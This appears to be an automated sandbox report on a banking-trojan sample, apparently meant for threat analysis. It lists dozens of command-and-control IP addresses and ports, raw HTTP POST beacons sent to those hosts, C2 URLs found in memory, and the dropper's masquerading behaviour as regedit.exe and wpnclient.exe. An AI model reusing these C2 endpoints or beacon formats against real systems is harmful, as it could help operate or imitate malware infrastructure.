                      Source: Malware configuration extractorIPs: 50.28.51.143:8080
                      Source: Malware configuration extractorIPs: 190.64.88.186:443
                      Source: Malware configuration extractorIPs: 111.67.12.221:8080
                      Source: Malware configuration extractorIPs: 12.162.84.2:8080
                      Source: Malware configuration extractorIPs: 46.105.114.137:8080
                      Source: Malware configuration extractorIPs: 59.148.253.194:8080
                      Source: Malware configuration extractorIPs: 201.213.177.139:80
                      Source: Malware configuration extractorIPs: 82.76.52.155:80
                      Source: Malware configuration extractorIPs: 172.104.169.32:8080
                      Source: Malware configuration extractorIPs: 188.251.213.180:80
                      Source: Malware configuration extractorIPs: 46.43.2.95:8080
                      Source: Malware configuration extractorIPs: 137.74.106.111:7080
                      Source: Malware configuration extractorIPs: 188.135.15.49:80
                      Source: Malware configuration extractorIPs: 185.94.252.27:443
                      Source: Malware configuration extractorIPs: 197.232.36.108:80
                      Source: Malware configuration extractorIPs: 60.249.78.226:8080
                      Source: Malware configuration extractorIPs: 187.162.248.237:80
                      Source: Malware configuration extractorIPs: 181.129.96.162:8080
                      Source: Malware configuration extractorIPs: 46.101.58.37:8080
                      Source: Malware configuration extractorIPs: 109.242.153.9:80
                      Source: Malware configuration extractorIPs: 178.211.45.66:8080
                      Source: Malware configuration extractorIPs: 200.59.6.174:80
                      Source: Malware configuration extractorIPs: 83.103.179.156:80
                      Source: Malware configuration extractorIPs: 172.86.186.21:8080
                      Source: Malware configuration extractorIPs: 70.32.115.157:8080
                      Source: Malware configuration extractorIPs: 81.214.253.80:443
                      Source: Malware configuration extractorIPs: 201.49.239.200:443
                      Source: Malware configuration extractorIPs: 149.202.72.142:7080
                      Source: Malware configuration extractorIPs: 190.45.24.210:80
                      Source: Malware configuration extractorIPs: 186.189.249.2:80
                      Source: Malware configuration extractorIPs: 219.92.13.25:80
                      Source: Malware configuration extractorIPs: 170.81.48.2:80
                      Source: Malware configuration extractorIPs: 51.75.33.127:80
                      Source: Malware configuration extractorIPs: 192.241.143.52:8080
                      Source: Malware configuration extractorIPs: 45.33.77.42:8080
                      Source: Malware configuration extractorIPs: 152.169.22.67:80
                      Source: Malware configuration extractorIPs: 1.226.84.243:8080
                      Source: Malware configuration extractorIPs: 78.206.229.130:80
                      Source: Malware configuration extractorIPs: 37.179.145.105:80
                      Source: Malware configuration extractorIPs: 68.183.170.114:8080
                      Source: Malware configuration extractorIPs: 192.232.229.54:7080
                      Source: Malware configuration extractorIPs: 103.236.179.162:80
                      Source: Malware configuration extractorIPs: 70.32.84.74:8080
                      Source: Malware configuration extractorIPs: 79.118.74.90:80
                      Source: Malware configuration extractorIPs: 60.93.23.51:80
                      Source: Malware configuration extractorIPs: 181.120.29.49:80
                      Source: Malware configuration extractorIPs: 213.52.74.198:80
                      Source: Malware configuration extractorIPs: 51.255.165.160:8080
                      Source: Malware configuration extractorIPs: 183.176.82.231:80
                      Source: Malware configuration extractorIPs: 186.193.229.123:80
                      Source: Malware configuration extractorIPs: 98.103.204.12:443
                      Source: Malware configuration extractorIPs: 129.232.220.11:8080
                      Source: Malware configuration extractorIPs: 181.61.182.143:80
                      Source: Malware configuration extractorIPs: 68.183.190.199:8080
                      Source: Malware configuration extractorIPs: 190.115.18.139:8080
                      Source: Malware configuration extractorIPs: 200.24.255.23:80
                      Source: Malware configuration extractorIPs: 103.13.224.53:80
                      Source: Malware configuration extractorIPs: 85.214.26.7:8080
                      Source: Malware configuration extractorIPs: 190.24.243.186:80
                      Source: Malware configuration extractorIPs: 87.106.46.107:8080
                      Source: Malware configuration extractorIPs: 177.107.79.214:8080
                      Source: Malware configuration extractorIPs: 12.163.208.58:80
                      Source: Malware configuration extractorIPs: 187.162.250.23:443
                      Source: Malware configuration extractorIPs: 109.101.137.162:8080
                      Source: Malware configuration extractorIPs: 82.76.111.249:443
                      Source: Malware configuration extractorIPs: 181.30.61.163:443
                      Source: Malware configuration extractorIPs: 5.196.35.138:7080
                      Source: Malware configuration extractorIPs: 51.15.7.145:80
                      Source: Malware configuration extractorIPs: 192.198.91.138:443
                      Source: Malware configuration extractorIPs: 188.157.101.114:80
                      Source: Malware configuration extractorIPs: 189.2.177.210:443
                      Source: Malware configuration extractorIPs: 181.123.6.86:80
                      Source: Malware configuration extractorIPs: 109.190.35.249:80
                      Source: Malware configuration extractorIPs: 45.16.226.117:443
                      Source: Malware configuration extractorIPs: 190.190.219.184:80
                      Source: Malware configuration extractorIPs: 104.131.41.185:8080
                      Source: Malware configuration extractorIPs: 101.187.81.254:80
                      Source: Malware configuration extractorIPs: 62.84.75.50:80
                      Source: Malware configuration extractorIPs: 178.250.54.208:8080
                      Source: Malware configuration extractorIPs: 201.71.228.86:80
                      Source: Malware configuration extractorIPs: 190.92.122.226:80
                      Source: Malware configuration extractorIPs: 138.97.60.140:8080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 7080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 7080
                      Source: unknownNetwork traffic detected: IP country count 37
                      Source: global trafficTCP traffic: 192.168.2.7:49852 -> 118.69.11.81:7080
                      Source: global trafficTCP traffic: 192.168.2.7:49936 -> 70.39.251.94:8080
                      Source: global trafficTCP traffic: 192.168.2.7:49978 -> 87.230.25.43:8080
                      Source: global trafficTCP traffic: 192.168.2.7:49979 -> 94.23.62.116:8080
                      Source: global trafficTCP traffic: 192.168.2.7:49983 -> 37.187.161.206:8080
                      Source: global trafficTCP traffic: 192.168.2.7:49985 -> 138.97.60.141:7080
                      Source: global trafficTCP traffic: 192.168.2.7:49986 -> 177.144.130.105:8080
                      Source: Joe Sandbox ViewIP Address: 81.214.253.80 81.214.253.80
                      Source: Joe Sandbox ViewIP Address: 94.176.234.118 94.176.234.118
                      Source: Joe Sandbox ViewIP Address: 78.206.229.130 78.206.229.130
                      Source: Joe Sandbox ViewIP Address: 181.58.181.9 181.58.181.9
                      Source: Joe Sandbox ViewIP Address: 213.197.182.158 213.197.182.158
                      Source: Joe Sandbox ViewASN Name: TTNETTR TTNETTR
                      Source: Joe Sandbox ViewASN Name: RACKRAYUABRakrejusLT RACKRAYUABRakrejusLT
                      Source: Joe Sandbox ViewASN Name: PROXADFR PROXADFR
                      Source: Joe Sandbox ViewASN Name: TelmexColombiaSACO TelmexColombiaSACO
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49798
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.7:49980
                      Source: global trafficHTTP traffic detected: POST /NVYQ97TAZC9w/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 190.202.229.74/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------8meBuivDM6SGek6tUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.202.229.74Content-Length: 4644Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /fcGeLw4p/ihOwVRSFxWUqd0kFgJ/4jfMfuO/EFhh74Ny/if77Qmg3AUNbSqT8W/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 118.69.11.81/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------c0nWQm36OPQWUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 118.69.11.81:7080Content-Length: 4644Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /cqrpaz30CJV6rcTaee/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 70.39.251.94/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------------K4vFIFYq3VJwQqSnJZgKHxUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 70.39.251.94:8080Content-Length: 4628Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /RXVvzMf/N2ZJn/HWDPmWEOobR5vsovM/wC1leNEGWSEakmmN/GZFwmhHZxt53d/1udoH/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 87.230.25.43/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------MbOc2Awa9XJUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 87.230.25.43:8080Content-Length: 4628Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /MVkm4Pe/qvF8hKL0/xQboaYc/tEAE/bvOe1g/jyw23JOFoAe/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 94.23.62.116/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------anyJNRk198MUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 94.23.62.116:8080Content-Length: 4612Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /L3q6/BqUpGZyIOtsBpT/0zFYv51ZlaEeQ4uYJ9/AHC3ud/VyzjKGaZCXONK/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 37.187.161.206/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------TLs7tmoYUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 37.187.161.206:8080Content-Length: 4612Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /9AWvP9tUiB0vNBtHp/soehIFh6TFhjHQ8To/FvPsEJTxaNlNquPbdI/I8C2Lbudvo8T8/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 45.46.37.97/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------------9uUbHI4f4XOvefoNk2pHpUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.46.37.97Content-Length: 4612Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /5ZnPdPFU/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 138.97.60.141/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------Vb7iRWQMUdrrUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 138.97.60.141:7080Content-Length: 4612Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /2g3r3uVJyW4vwEwW2rV/BSwocEVkUzwjsP3EXb/tToQfSpvkbELnFp/GKhVdMsrUWytWXLFY/s5tFZi8Vxs3oBnZWiR/tXm8d1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 177.144.130.105/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------------------Xese4L6C2RTuoGm0FY1zcNpUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 177.144.130.105:8080Content-Length: 4612Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /XCULSRNtkPzEnoI/N2CP4bvAn2eR7Mn/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 169.1.39.242/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-------------------Za2AS9T3nIW3ZQcAbANUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 169.1.39.242Content-Length: 4612Cache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.202.229.74
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.202.229.74
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.202.229.74
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.202.229.74
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.202.229.74
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.202.229.74
                      Source: unknownTCP traffic detected without corresponding DNS query: 118.69.11.81
                      Source: unknownTCP traffic detected without corresponding DNS query: 118.69.11.81
                      Source: unknownTCP traffic detected without corresponding DNS query: 118.69.11.81
                      Source: unknownTCP traffic detected without corresponding DNS query: 118.69.11.81
                      Source: unknownTCP traffic detected without corresponding DNS query: 118.69.11.81
                      Source: unknownTCP traffic detected without corresponding DNS query: 118.69.11.81
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.39.251.94
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.39.251.94
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.39.251.94
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.39.251.94
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.39.251.94
                      Source: unknownTCP traffic detected without corresponding DNS query: 70.39.251.94
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.230.25.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.230.25.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.230.25.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.230.25.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.230.25.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.230.25.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                      Source: unknownTCP traffic detected without corresponding DNS query: 37.187.161.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 37.187.161.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 37.187.161.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 37.187.161.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 37.187.161.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 37.187.161.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.46.37.97
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.46.37.97
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.46.37.97
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.46.37.97
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.46.37.97
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.46.37.97
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.97.60.141
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.97.60.141
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.97.60.141
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.97.60.141
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.97.60.141
                      Source: unknownTCP traffic detected without corresponding DNS query: 138.97.60.141
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.144.130.105
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.144.130.105
                      Source: global trafficDNS traffic detected: DNS query: time.windows.com
                      Source: unknownHTTP traffic detected: POST /NVYQ97TAZC9w/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 190.202.229.74/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------8meBuivDM6SGek6tUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.202.229.74Content-Length: 4644Cache-Control: no-cache
                      Source: wpnclient.exe, 00000004.00000003.2232761331.00000000028EC000.00000004.00000020.00020000.00000000.sdmp, wpnclient.exe, 00000004.00000002.2542343717.00000000028EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://118.69.11.81:7080/fcGeLw4p/ihOwVRSFxWUqd0kFgJ/4jfMfuO/EFhh74Ny/if77Qmg3AUNbSqT8W/
                      Source: wpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://138.97.60.141:7080/5ZnPdPFU/
                      Source: wpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://138.97.60.141:7080/5ZnPdPFU/H
                      Source: wpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://138.97.60.141:7080/5ZnPdPFU/Y
                      Source: wpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, wpnclient.exe, 00000004.00000002.2542343717.00000000028EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://169.1.39.242/XCULSRNtkPzEnoI/N2CP4bvAn2eR7Mn/
                      Source: wpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://169.1.39.242/XCULSRNtkPzEnoI/N2CP4bvAn2eR7Mn/s
                      Source: wpnclient.exe, 00000004.00000002.2542343717.00000000028EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://169.1.39.242/XCULSRNtkPzEnoI/N2CP4bvAn2eR7Mn/wshqos.dll.mui
                      Source: wpnclient.exe, 00000004.00000002.2541739448.000000000061E000.00000004.00000020.00020000.00000000.sdmp, wpnclient.exe, 00000004.00000002.2542343717.00000000028EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://177.144.130.105:8080/2g3r3uVJyW4vwEwW2rV/BSwocEVkUzwjsP3EXb/tToQfSpvkbELnFp/GKhVdMsrUWytWXLFY
                      Source: wpnclient.exe, 00000004.00000002.2542343717.00000000028EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.187.161.206:8080/L3q6/BqUpGZyIOtsBpT/0zFYv51ZlaEeQ4uYJ9/AHC3ud/VyzjKGaZCXONK/
                      Source: wpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.46.37.97/9AWvP9tUiB0vNBtHp/soehIFh6TFhjHQ8To/FvPsEJTxaNlNquPbdI/I8C2Lbudvo8T8/
                      Source: wpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.46.37.97/9AWvP9tUiB0vNBtHp/soehIFh6TFhjHQ8To/FvPsEJTxaNlNquPbdI/I8C2Lbudvo8T8/;
                      Source: wpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://70.39.251.94:8080/cqrpaz30CJV6rcTaee//if77Qmg3AUNbSqT8W/s
                      Source: wpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://70.39.251.94:8080/cqrpaz30CJV6rcTaee/6
                      Source: wpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, wpnclient.exe, 00000004.00000003.2232761331.00000000028EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.230.25.43:8080/RXVvzMf/N2ZJn/HWDPmWEOobR5vsovM/wC1leNEGWSEakmmN/GZFwmhHZxt53d/1udoH/
                      Source: wpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.230.25.43:8080/RXVvzMf/N2ZJn/HWDPmWEOobR5vsovM/wC1leNEGWSEakmmN/GZFwmhHZxt53d/1udoH/Q
                      Source: wpnclient.exe, 00000004.00000003.2232761331.00000000028EC000.00000004.00000020.00020000.00000000.sdmp, wpnclient.exe, 00000004.00000002.2542343717.00000000028EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.23.62.116:8080/MVkm4Pe/qvF8hKL0/xQboaYc/tEAE/bvOe1g/jyw23JOFoAe/

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 0.2.mNtu4X8ZyE.exe.221052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regedit.exe.1fd279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.wpnclient.exe.21e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regedit.exe.1fd052e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.mNtu4X8ZyE.exe.221279e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regedit.exe.1fd279e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.wpnclient.exe.59052e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.wpnclient.exe.59052e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regedit.exe.1fd052e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.mNtu4X8ZyE.exe.221052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.mNtu4X8ZyE.exe.221279e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.wpnclient.exe.59279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.wpnclient.exe.59279e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.mNtu4X8ZyE.exe.2670000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regedit.exe.21b0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2541675452.0000000000590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1322151004.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1306249932.0000000002614000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2541960416.0000000002184000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1322291450.0000000002154000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1322392048.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E2680 CryptCreateHash,CryptAcquireContextW,RtlAllocateHeap,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptGenKey,4_2_021E2680

                      System Summary

                      barindex
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeProcess created: C:\Windows\SysWOW64\expand\regedit.exe "C:\Windows\SysWOW64\expand\regedit.exe"
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B91E0 OpenSCManagerW,CloseServiceHandle,DeleteService,CloseServiceHandle,2_2_021B91E0
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeFile created: C:\Windows\SysWOW64\expand\Jump to behavior
                      Source: C:\Windows\SysWOW64\expand\regedit.exeFile created: C:\Windows\SysWOW64\winhttpcom\Jump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeFile deleted: C:\Windows\SysWOW64\expand\regedit.exe:Zone.IdentifierJump to behavior
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_026783300_2_02678330
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_026786F00_2_026786F0
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_026768600_2_02676860
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02677B300_2_02677B30
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02673CE00_2_02673CE0
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02673EE00_2_02673EE0
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_026742C90_2_026742C9
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_026741B70_2_026741B7
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_026741900_2_02674190
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02215E670_2_02215E67
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02215A7E0_2_02215A7E
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_0221A28E0_2_0221A28E
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_022196CE0_2_022196CE
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02219ECE0_2_02219ECE
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_022183FE0_2_022183FE
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_0221587E0_2_0221587E
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02215D2E0_2_02215D2E
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02215D550_2_02215D55
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B83302_2_021B8330
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B86F02_2_021B86F0
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B7B302_2_021B7B30
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B68602_2_021B6860
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B41902_2_021B4190
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B41B72_2_021B41B7
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B42C92_2_021B42C9
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B3CE02_2_021B3CE0
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B3EE02_2_021B3EE0
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_01FD5D552_2_01FD5D55
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_01FD5D2E2_2_01FD5D2E
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_01FD587E2_2_01FD587E
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_01FD83FE2_2_01FD83FE
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_01FD96CE2_2_01FD96CE
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_01FD9ECE2_2_01FD9ECE
